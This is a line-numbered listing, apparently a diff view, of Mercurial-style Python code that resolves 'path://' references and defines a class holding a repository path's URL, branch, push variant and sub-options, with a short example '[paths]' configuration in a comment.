789 792 """return the result of "path://" logic applied on a given path"""
790 793 new_paths = []
791 794 if base_path.url.scheme != b'path':
792 795 new_paths.append(base_path)
793 796 else:
794 797 assert base_path.url.path is None
795 798 sub_paths = paths.get(base_path.url.host)
796 799 if sub_paths is None:
797 800 m = _(b'cannot use `%s`, "%s" is not a known path')
798 801 m %= (base_path.rawloc, base_path.url.host)
799 802 raise error.Abort(m)
800 803 for subpath in sub_paths:
801 804 path = base_path.copy()
802 805 if subpath.raw_url.scheme == b'path':
803 806 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
804 807 m %= (path.rawloc, path.url.host)
805 808 raise error.Abort(m)
806 809 path.url = subpath.url
807 810 path.rawloc = subpath.rawloc
808 811 path.loc = subpath.loc
809 812 if path.branch is None:
810 813 path.branch = subpath.branch
811 814 else:
812 815 base = path.rawloc.rsplit(b'#', 1)[0]
813 816 path.rawloc = b'%s#%s' % (base, path.branch)
814 817 suboptions = subpath._all_sub_opts.copy()
815 818 suboptions.update(path._own_sub_opts)
816 819 path._apply_suboptions(ui, suboptions)
817 820 new_paths.append(path)
818 821 return new_paths
819 822
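# Illustrative configuration handled by the `path://` logic above (the URLs
# are placeholders): `other` reuses the location of `default` while adding a
# sub-option of its own, which takes precedence over `default`'s sub-options:
#
#   [paths]
#   default = https://hg.example.org/repo
#   other = path://default
#   other:pushurl = ssh://hg.example.org/repo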
820 823
821 824 class path:
822 825 """Represents an individual path and its configuration."""
823 826
824 827 def __init__(
825 828 self,
826 829 ui=None,
827 830 name=None,
828 831 rawloc=None,
829 832 suboptions=None,
830 833 validate_path=True,
831 834 ):
832 835 """Construct a path from its config options.
833 836
834 837 ``ui`` is the ``ui`` instance the path is coming from.
835 838 ``name`` is the symbolic name of the path.
836 839 ``rawloc`` is the raw location, as defined in the config.
837 840 ``_pushloc`` is the raw locations pushes should be made to.
838 841 (see the `get_push_variant` method)
839 842
840 843 If ``name`` is not defined, we require that the location be a) a local
841 844 filesystem path with a .hg directory or b) a URL. If not,
842 845 ``ValueError`` is raised.
843 846 """
844 847 if ui is None:
845 848 # used in copy
846 849 assert name is None
847 850 assert rawloc is None
848 851 assert suboptions is None
849 852 return
850 853
851 854 if not rawloc:
852 855 raise ValueError(b'rawloc must be defined')
853 856
854 857 self.name = name
855 858
856 859 # set by path variant to point to their "non-push" version
857 860 self.main_path = None
858 861 self._setup_url(rawloc)
859 862
860 863 if validate_path:
861 864 self._validate_path()
862 865
863 866 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
864 867 self._own_sub_opts = {}
865 868 if suboptions is not None:
866 869 self._own_sub_opts = suboptions.copy()
867 870 sub_opts.update(suboptions)
868 871 self._all_sub_opts = sub_opts.copy()
869 872
870 873 self._apply_suboptions(ui, sub_opts)
871 874
872 875 def _setup_url(self, rawloc):
873 876 # Locations may define branches via syntax <base>#<branch>.
874 877 u = url(rawloc)
875 878 branch = None
876 879 if u.fragment:
877 880 branch = u.fragment
878 881 u.fragment = None
879 882
880 883 self.url = u
881 884 # the url from the config/command line before dealing with `path://`
882 885 self.raw_url = u.copy()
883 886 self.branch = branch
884 887
885 888 self.rawloc = rawloc
886 889 self.loc = b'%s' % u
887 890
888 891 def copy(self, new_raw_location=None):
889 892 """make a copy of this path object
890 893
891 894 When `new_raw_location` is set, the new path will point to it.
892 895 This is used by the schemes extension to expand the scheme.
893 896 """
894 897 new = self.__class__()
895 898 for k, v in self.__dict__.items():
896 899 new_copy = getattr(v, 'copy', None)
897 900 if new_copy is not None:
898 901 v = new_copy()
899 902 new.__dict__[k] = v
900 903 if new_raw_location is not None:
901 904 new._setup_url(new_raw_location)
902 905 return new
903 906
904 907 @property
905 908 def is_push_variant(self):
906 909 """is this a path variant to be used for pushing"""
907 910 return self.main_path is not None
908 911
909 912 def get_push_variant(self):
910 913 """get a "copy" of the path, but suitable for pushing
911 914
912 915 This means using the value of the `pushurl` option (if any) as the url.
913 916
914 917 The original path is available in the `main_path` attribute.
915 918 """
916 919 if self.main_path:
917 920 return self
918 921 new = self.copy()
919 922 new.main_path = self
920 923 if self._pushloc:
921 924 new._setup_url(self._pushloc)
922 925 return new
923 926
924 927 def _validate_path(self):
925 928 # When given a raw location but not a symbolic name, validate the
926 929 # location is valid.
927 930 if (
928 931 not self.name
929 932 and not self.url.scheme
930 933 and not self._isvalidlocalpath(self.loc)
931 934 ):
932 935 raise ValueError(
933 936 b'location is not a URL or path to a local '
934 937 b'repo: %s' % self.rawloc
935 938 )
936 939
937 940 def _apply_suboptions(self, ui, sub_options):
938 941 # Now process the sub-options. If a sub-option is registered, its
939 942 # attribute will always be present. The value will be None if there
940 943 # was no valid sub-option.
941 944 for suboption, (attr, func) in _pathsuboptions.items():
942 945 if suboption not in sub_options:
943 946 setattr(self, attr, None)
944 947 continue
945 948
946 949 value = func(ui, self, sub_options[suboption])
947 950 setattr(self, attr, value)
948 951
949 952 def _isvalidlocalpath(self, path):
950 953 """Returns True if the given path is a potentially valid repository.
951 954 This is its own function so that extensions can change the definition of
952 955 'valid' in this case (like when pulling from a git repo into a hg
953 956 one)."""
954 957 try:
955 958 return os.path.isdir(os.path.join(path, b'.hg'))
956 959 # Python 2 may return TypeError. Python 3, ValueError.
957 960 except (TypeError, ValueError):
958 961 return False
959 962
960 963 @property
961 964 def suboptions(self):
962 965 """Return sub-options and their values for this path.
963 966
964 967 This is intended to be used for presentation purposes.
965 968 """
966 969 d = {}
967 970 for subopt, (attr, _func) in _pathsuboptions.items():
968 971 value = getattr(self, attr)
969 972 if value is not None:
970 973 d[subopt] = value
971 974 return d